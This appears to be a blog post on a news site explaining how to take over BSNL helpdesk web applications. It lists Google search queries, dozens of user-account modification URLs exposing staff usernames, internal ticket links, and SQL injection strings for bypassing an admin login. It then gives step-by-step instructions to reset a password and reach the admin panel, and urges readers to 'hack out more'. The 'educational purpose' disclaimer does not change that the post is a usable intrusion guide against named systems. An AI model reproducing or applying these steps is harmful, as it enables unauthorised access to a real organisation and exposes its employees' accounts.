Bsnl helpdesk application hacked - BestCyberNews: Online News Presenter in the present world

BestCyberNews: Online News Presenter in the present world

Start knowing

test banner

Breaking

Bsnl helpdesk application hacked


Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it.

Bsnl hosts a helpdesk application at :
http://dotsoft.bsnl.co.in/helpdesk
Doing a search on google for :
inurl:dotsoft.bsnl.co.in/helpdesk/moduser.asp
reveals around 225 links of users of the system.



Some urls are :
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=jalnadotsoft
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=review
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=sdebhr
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=DBASOL
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=pramarao
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=jmndba
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbcdotsoft
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=hacked%20by
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=aowl
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=ramanap
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=mbn
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=cpadma
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbatrich
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=chauhanak
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=BISHNOI
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbamr
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=jrbarod
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=gmtdjbp
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=htddba
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=htd
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=helpdesk
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=qwert12345
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=cjjoshi
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=APDBARTG
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=elrdba
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=mramaiah
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=shalini
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=gaurav
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=ndshah
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=DDNBSNL
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=s1ckyyyy
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=nskdotsoft
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=hitic
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=trp
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=asmjrt_tra
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=DBAMRT
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=reetagreenday
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=asrdotsoft
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=mssrama
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=DBADKL
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbagulbarga
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=sanmalkani
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=robin
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=asalgotra
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=avinash
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=ngd
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=ashu.yad111
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=nlr
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=ubuntu
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=GOADBA
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=gtr
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=dbafbd
http://dotsoft.bsnl.co.in/helpdesk/moduser.asp?un=asmtez_tra
The link is meant to change the user details and should have been password protected. But they dont appear to be so. If any of the above urls work , then the password can be changed , and then the same password can be used to login in the application at this url 
http://dotsoft.bsnl.co.in/helpdesk/default.asp.
But this is just part of it. Doing a more generic search on Google will reveal even more remarkable results.
Doing a search for this url on google as follows :
inurl:dotsoft.bsnl.co.in/helpdesk
The above will show links of applications internal pages like “Problem Details” which are publicly visible and accessible. The vulnerable urls are publicly available on google search results as well.
Some links are :
http://dotsoft.bsnl.co.in/helpdesk/details3.asp?tid=70322001&sby=decomp%20%20%20%20%20%20%20%20%20%20%20%20%20%20&sto=rajesh
http://dotsoft.bsnl.co.in/helpdesk/details3.asp?tid=80524015&sby=dbcdotsoft%20%20%20%20%20%20%20%20%20%20&sto=wkgds
http://dotsoft.bsnl.co.in/helpdesk/details3.asp?tid=90622012&sby=ddnbsnl%20%20%20%20%20%20%20%20%20%20%20%20%20&sto=kgr
http://dotsoft.bsnl.co.in/helpdesk/details3.asp?tid=81220006&sby=ajdesai%20%20%20%20%20%20%20%20%20%20%20%20%20&sto=kgr
and so on.
Another important link found by random browsing is :
http://dotsoft.bsnl.co.in/helpdesk/viewreports.asp
It has links to various reports of the helpdesk application.
There is another helpdesk application being hosted at :
http://ap.bsnl.co.in/mishelpdesk/admin.asp
So searching for :
inurl:ap.bsnl.co.in/mishelpdesk
will reveal lots of url meant to be password protected.
But 
http://ap.bsnl.co.in/mishelpdesk/admin.asp is vulnerable to simple sql inject as well.
Simple enter any one of these following the password field :
‘ or ’1′=’1
‘ or ’1′=’1′ — ‘
‘ or ’1′=’1′ ({ ‘
‘ or ’1′=’1′ /* ‘
and you might get logged in.

Getting admin access on the application

1. First open any moduser link that works.
2. Now change password to “admin” and save.
3. Then login here http://dotsoft.bsnl.co.in/helpdesk/default.asp
You should see this page :

4. After logging in open this page http://dotsoft.bsnl.co.in/helpdesk/logadmin.asp
You should see admin options :

The application is in a pathetic condition. If you are a creative hacker then you may be able to hack out more from this system. Best of luck!!
Amazing stuff from Bsnl!!

Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it.

No comments:

Post a Comment